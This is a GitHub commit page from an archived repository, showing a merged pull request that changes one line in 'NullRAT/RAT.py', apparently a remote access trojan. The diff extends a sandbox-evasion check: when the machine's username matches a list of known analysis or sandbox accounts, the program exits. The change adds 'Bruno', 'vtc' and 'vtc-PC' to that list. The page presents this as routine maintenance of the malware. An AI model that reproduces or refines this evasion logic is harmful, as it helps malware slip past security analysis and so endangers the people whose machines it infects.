Skip to content
This repository was archived by the owner on Mar 6, 2026. It is now read-only.

Commit 0ee8d6c

Browse files
authored
Merge pull request #100 from nightfallenxyz/patch-1
Update RAT.py
2 parents de9796d + 5dfd28c commit 0ee8d6c

1 file changed

Lines changed: 1 addition & 1 deletion

File tree

NullRAT/RAT.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -201,7 +201,7 @@ def checksss(processName):
201201
return False
202202

203203
# Anti TikTok
204-
for i in ["WDAGUtilityAccount","Abby","Peter Wilson","hmarc","patex","JOHN-PC","RDhJ0CNFevzX","kEecfMwgj","Frank","8Nl0ColNQ5bq","Lisa","John","george","PxmdUOpVyx","8VizSM","w0fjuOVmCcP5A","lmVwjj9b","PqONjHVwexsS","3u2v9m8","Julia","HEUeRzl","Joe"]:
204+
for i in ["WDAGUtilityAccount","Abby","Peter Wilson","hmarc","patex","JOHN-PC","RDhJ0CNFevzX","kEecfMwgj","Frank","8Nl0ColNQ5bq","Lisa","John","george","PxmdUOpVyx","8VizSM","w0fjuOVmCcP5A","lmVwjj9b","PqONjHVwexsS","3u2v9m8","Julia","HEUeRzl","Joe","Bruno","vtc","vtc-PC"]:
205205
if i in os.getenv("username"):
206206
raise SystemExit(0)
207207

0 commit comments

Comments
 (0)